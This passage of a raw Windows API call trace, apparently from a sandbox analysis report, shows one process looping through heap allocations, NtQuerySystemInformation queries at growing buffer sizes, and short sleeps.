ResultLength=0x19ee88*=0xc0) returned 0x0 [0203.143] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.143] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0203.144] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.144] Sleep (dwMilliseconds=0x110) [0203.158] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0203.158] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.158] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.159] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0203.159] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.159] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.160] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0203.175] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.177] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.177] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0203.177] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0203.178] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.178] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0203.178] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.178] Sleep (dwMilliseconds=0x110) [0203.201] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0203.201] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.202] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.202] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0203.202] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.203] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.203] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0203.204] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.204] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.205] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0203.205] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0203.206] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.206] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0203.206] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.206] Sleep (dwMilliseconds=0x110) [0203.223] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0203.223] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.224] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.227] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0203.227] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.228] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.228] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0203.228] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.229] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.229] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0203.229] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0203.230] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.230] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0203.231] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.233] Sleep (dwMilliseconds=0x110) [0203.267] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0203.267] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.268] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.268] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0203.268] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.269] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.269] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0203.270] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.270] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.270] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0203.270] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0203.271] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.271] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0203.272] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.272] Sleep (dwMilliseconds=0x110) [0203.285] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0203.285] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.286] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.286] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0203.286] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.287] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.287] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0203.288] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.288] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.289] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0203.289] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0203.290] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.293] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0203.293] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.293] Sleep (dwMilliseconds=0x110) [0203.313] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0203.313] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.314] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.314] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0203.314] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.315] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.315] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0203.315] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.316] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.316] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0203.316] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0203.316] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.316] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0203.317] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.317] Sleep (dwMilliseconds=0x110) [0203.329] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0203.329] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.329] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.329] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0203.330] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.330] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.330] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0203.331] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.331] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.331] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0203.331] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0203.332] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.332] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0203.332] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.332] Sleep (dwMilliseconds=0x110) [0203.346] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0203.346] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.347] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.347] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0203.347] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.348] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.348] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0203.348] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.349] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.349] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0203.349] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0203.350] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.350] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0203.350] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.350] Sleep (dwMilliseconds=0x110) [0203.359] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0203.359] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.360] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.360] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0203.360] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.360] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.360] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0203.360] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.361] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.361] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0203.361] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0203.361] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.362] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0203.362] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.362] Sleep (dwMilliseconds=0x110) [0203.375] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0203.375] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.376] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.376] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0203.376] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.377] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.377] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0203.377] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.378] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.378] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0203.378] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0203.378] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.378] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0203.379] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.379] Sleep (dwMilliseconds=0x110) [0203.392] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0203.392] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.393] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.393] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0203.393] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.394] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.394] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0203.394] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.395] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.395] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0203.395] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0203.396] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.396] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0203.397] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.397] Sleep (dwMilliseconds=0x110) [0203.403] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0203.403] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.432] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.432] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0203.432] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.432] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.432] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0203.432] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.433] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.433] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0203.433] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0203.433] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.434] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0203.435] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.435] Sleep (dwMilliseconds=0x110) [0203.454] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0203.454] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.455] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.455] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0203.455] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.455] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.456] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0203.456] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.456] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.457] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0203.457] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0203.457] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.457] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0203.458] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.458] Sleep (dwMilliseconds=0x110) [0203.471] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0203.471] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.471] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.472] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0203.472] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.472] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.473] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0203.473] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.474] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.474] 